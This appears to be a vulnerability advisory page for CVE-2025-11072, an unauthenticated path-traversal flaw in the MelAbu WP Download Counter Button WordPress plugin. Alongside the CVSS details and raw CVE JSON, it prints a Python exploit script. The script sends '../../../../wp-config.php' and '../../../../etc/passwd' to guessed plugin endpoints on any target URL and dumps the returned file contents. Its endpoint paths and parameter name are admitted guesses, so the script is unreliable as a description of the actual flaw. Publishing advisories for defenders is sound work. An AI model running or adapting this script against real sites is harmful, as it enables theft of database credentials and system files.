Security Vulnerability Report
中文
CVE-2025-11072 CVSS 5.3 MEDIUM

CVE-2025-11072

Published: 2025-11-05 06:15:33
Last Modified: 2026-04-15 00:35:42

Description

The MelAbu WP Download Counter Button WordPress plugin through 1.8.6.7 does not validate the path of files to be downloaded, which could allow unauthenticated attacker to read/download arbitrary files.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MelAbu WP Download Counter Button插件 <= 1.8.6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-11072 PoC - Path Traversal in MelAbu WP Download Counter Button # Target: WordPress site with vulnerable MelAbu Download Counter Button plugin def check_vulnerability(base_url): """Check if target is vulnerable to CVE-2025-11072""" # Common WordPress plugin download endpoint patterns paths_to_try = [ '/wp-content/plugins/wp-download-counter-button/download.php', '/wp-content/plugins/wp-download-counter-button/inc/download.php', '/wp-content/plugins/wp-download-counter/download.php', '/wp-content/plugins/download-counter-button/download.php' ] # Target files to read (using path traversal) target_files = [ '../../../../wp-config.php', # WordPress config file '../../../../etc/passwd', # Linux system file ] for path in paths_to_try: for target in target_files: url = base_url.rstrip('/') + path params = {'file': target} # Common parameter name try: response = requests.get(url, params=params, timeout=10, verify=False) # Check if file content was returned if response.status_code == 200: content = response.text # Validate if we got actual file content if 'wp-config.php' in target and 'DB_NAME' in content: print(f'[+] VULNERABLE! Found wp-config.php at: {url}') print(f'[+] File content preview:\n{content[:500]}...') return True elif 'passwd' in target and 'root:' in content: print(f'[+] VULNERABLE! Found /etc/passwd at: {url}') print(f'[+] File content preview:\n{content[:500]}...') return True except requests.exceptions.RequestException as e: print(f'[-] Error testing {url}: {e}') print('[-] Target does not appear to be vulnerable') return False if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_url>') print(f'Example: python {sys.argv[0]} http://target.com') sys.exit(1) target = sys.argv[1] print(f'[*] Testing target: {target}') print(f'[*] CVE-2025-11072 - Path Traversal in MelAbu WP Download Counter Button\n') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11072", "sourceIdentifier": "[email protected]", "published": "2025-11-05T06:15:32.990", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MelAbu WP Download Counter Button WordPress plugin through 1.8.6.7 does not validate the path of files to be downloaded, which could allow unauthenticated attacker to read/download arbitrary files."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/538117c5-b04c-45fc-a953-6f619fdf7eaf/", "source": "[email protected]"}]}}